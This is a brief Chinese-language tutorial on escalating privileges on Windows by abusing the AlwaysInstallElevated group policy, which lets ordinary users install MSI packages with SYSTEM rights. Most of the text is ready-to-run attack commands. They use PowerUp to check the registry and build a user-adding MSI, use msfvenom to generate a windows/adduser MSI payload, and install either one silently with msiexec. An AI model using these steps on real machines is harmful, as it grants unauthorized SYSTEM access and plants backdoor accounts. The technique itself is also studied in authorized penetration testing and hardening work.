AlwaysInstallElevated提权

AlwaysInstallElevated提权

windows有一个系统进程MSIEXEC,用于安装Windows Installer安装包,AlwaysInstallElevated是一个组策略配置,如果启用,那么将允许普通用户以SYSTEM权限运行msi文件进行安装。如果对方机器恰好开启,我们就可以利用此缺陷提权。

powerup

下载链接:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

powerup的利用:

检查注册表的设置:

1
powershell -exec bypass -Command "& {import-module .\powerup.ps1; get-registryalwaysinstallelevated}"

生成新的账户:

1
powershell -exec bypass -Command "& {import-module .\powerup.ps1; write-useraddmsi}"

生成一个msi文件

使用以下命令静默安装即可生成新用户

1
msiexec /q /i useradd.msi

msf

msf生成

1
msfvenom -p windows/adduser USER=test1 PASSWORD=passwd1 -f msi -o up.msi

1
msiexec /quiet /qn /i up.msi